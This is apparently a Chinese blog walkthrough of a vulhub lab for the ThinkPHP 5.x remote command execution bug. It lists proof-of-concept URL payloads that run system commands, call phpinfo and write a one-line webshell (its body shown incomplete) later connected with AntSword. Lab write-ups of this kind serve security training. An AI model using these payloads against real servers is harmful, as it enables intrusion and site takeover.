Thinkphp5x远程命令执行 靶场攻略

你不要在理我了2024-09-27 17:51

环境配置

靶场:vulhub/thinkphp/5-rce

docker-compose up -d #启动环境

漏洞复现

1.访问靶场:http://172.16.1.198:8080/

2.远程命令执⾏

POC:

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]

\]=whoami ![](https://i-blog.csdnimg.cn/direct/16753b4fd3bb4544bdb52b2109a6e6f3.png) #### 3.远程代码执行 POC: ?s=/Index/\\think\\app/invokefunction\&function=call_user_func_array\&vars\[0\]=phpinfo\&vars\[ 1\]\[\]=-1 ![](https://i-blog.csdnimg.cn/direct/6a91a4e3c31e4e63a88d3ab5d65d24cf.png) #### 4.写入一句话木马到根目录下的1.php POC: ?s=index/think\\app/invokefunction\&function=call_user_func_array\&vars\[0\]=system\&vars\[1\]\[\]=echo "\" \> 1.php ![](https://i-blog.csdnimg.cn/direct/732b49aa73e14b64bf6827488e1fe6d8.png) #### 5.蚁剑连接 ![](https://i-blog.csdnimg.cn/direct/400f12233e0e401290c55af68f48328a.png)

相关推荐
ConardLi4 分钟前
把 Claude Design 做成 Skill,你的网站也能拥有顶级视觉体验
前端·人工智能·后端
@ chen9 分钟前
IDEA初始化配置
java·ide·intellij-idea
wellc1 小时前
SpringBoot集成Flowable
java·spring boot·后端
IT_陈寒1 小时前
React状态更新那点事儿,我掉坑里爬了半天
前端·人工智能·后端
Hui Baby2 小时前
springAi+MCP三种
java
hsjcjh2 小时前
【MySQL】C# 连接MySQL
java
敖正炀2 小时前
LinkedBlockingDeque详解
java
wangyadong3172 小时前
datagrip 链接mysql 报错
java
untE EADO2 小时前
Tomcat的server.xml配置详解
xml·java·tomcat
ictI CABL2 小时前
Tomcat 乱码问题彻底解决
java·tomcat
热门推荐
012026年4月技术前沿:AI大模型爆发、智能体革命与量子安全新纪元02GitHub 镜像站点032026年4月AI大事件深度解读:大模型竞争进入“深水区“042026 年 AI 编程助手全面对比评测:Cursor vs Copilot vs Claude Code vs GitHub Copilot Free05近期有什么ai的新消息,新动态? 2026.4月06AI Weekly | 2026年4月第二周 · GitHub热门项目与AI发展趋势深度解析07Claude Code Windows 兼容性问题:指定版本 2.1.112 可解决08从限购到畅通:GLM-5.1 Coding Plan接入攻略09UBUNTU Claude Code 报错 claude native binary not installed10CC-Switch & Claude 基于 Linux 服务器安装使用指南